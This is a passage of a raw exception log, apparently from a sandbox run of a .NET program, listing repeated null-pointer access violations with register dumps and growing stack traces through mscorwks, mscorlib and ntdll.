DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545351.18775
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90827880
registers.ebx: 40148980
registers.esp: 90827880
registers.ebp: 90827912
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545352.70375
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90827704
registers.ebp: 90827736
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545352.71875
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90827704
registers.ebx: 40148980
registers.esp: 90827704
registers.ebp: 90827736
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545354.23475
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90827528
registers.ebp: 90827560
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545354.23475
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90827528
registers.ebx: 40148980
registers.esp: 90827528
registers.ebp: 90827560
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545355.75075
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90827352
registers.ebp: 90827384
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545355.76575
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90827352
registers.ebx: 40148980
registers.esp: 90827352
registers.ebp: 90827384
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545357.28175
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90827176
registers.ebp: 90827208
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545357.29675
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90827176
registers.ebx: 40148980
registers.esp: 90827176
registers.ebp: 90827208
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545358.82875
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90827000
registers.ebp: 90827032
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545358.84375
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90827000
registers.ebx: 40148980
registers.esp: 90827000
registers.ebp: 90827032
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545360.35975
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90826824
registers.ebp: 90826856
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545360.37575
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90826824
registers.ebx: 40148980
